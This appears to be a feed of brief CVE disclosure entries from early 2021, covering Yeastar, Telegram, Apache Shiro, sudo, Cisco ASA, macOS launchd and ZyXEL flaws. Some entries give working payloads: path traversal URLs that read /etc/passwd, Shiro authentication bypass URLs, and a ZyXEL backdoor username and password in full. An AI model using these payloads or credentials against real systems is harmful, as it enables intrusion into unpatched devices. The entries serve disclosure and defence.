CVE-2021-27328
2021-02-19 13:16:31

Path Traversal on Yeastar TG400 GSM Gateway - 91.3.0.3 To get firmware decrypting password: http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect To get /etc/paswd: http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd https://github.com/SQSamir/CVE-2021-27328

CVE-2021-27205
2021-02-12 14:24:11

Telegram prior to 7.4 (212543) for macOS (7.3 (211334) Stable) stores the local copy of received message (audio/video) on a custom path even after those messages are deleted/disappeared from the secret chat. https://www.inputzero.io/2020/12/telegram-privacy-fails-again.html

CVE-2021-27204
2021-02-12 14:23:58

Telegram prior to 7.4 (212543) for macOS (7.3 (211334) Stable) stores local passcode in plain text. https://www.inputzero.io/2020/12/telegram-privacy-fails-again.html

CVE-2020-17523
2021-02-07 07:57:05

Apache Shiro very easy to exploit authentication bypass vulnerability. Use blank characters such as spaces to bypass shiro authentication: http://127.0.0.1/admin/%20 or http://127.0.0.1/admin/%20/ https://github.com/jweny/shiro-cve-2020-17523

CVE-2021-3156
2021-02-03 12:31:25

Exploit of Sudo heap-based buffer overflow privilege escalation CVE-2021-3156: https://github.com/r4j0x00/exploits/tree/master/CVE-2021-3156

CVE-2020-3452
2021-02-03 08:37:57

Live Exploitation of CVE 2020-3452 Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) unauthenticated directory traversal

CVE-2020-9971
2021-01-29 09:12:59

Abusing XPC Service mechanism to elevate privilege in macOS/iOS In this blog, I will detail an interesting logic vulnerability I found in launchd process when it is managing the XPC Services. It’s easy be exploited and 100% stable to get high privilege in macOS/iOS. Because launchd is the most fundamental and important component in the OS, the vulnerability would also work even from the most restricted app sandbox. The vulnerability should work before macOS Big Sur and iOS 13.5. https://xlab.tencent.com/en/2021/01/11/cve-2020-9971-abusing-xpc-service-to-elevate-privilege/

CVE-2020-29583
2021-01-21 19:28:18

ZyXEL USG and ZyWALL hardcoded (backdoor) credentials: Username: zyfwp Password: PrOw!aN_fXp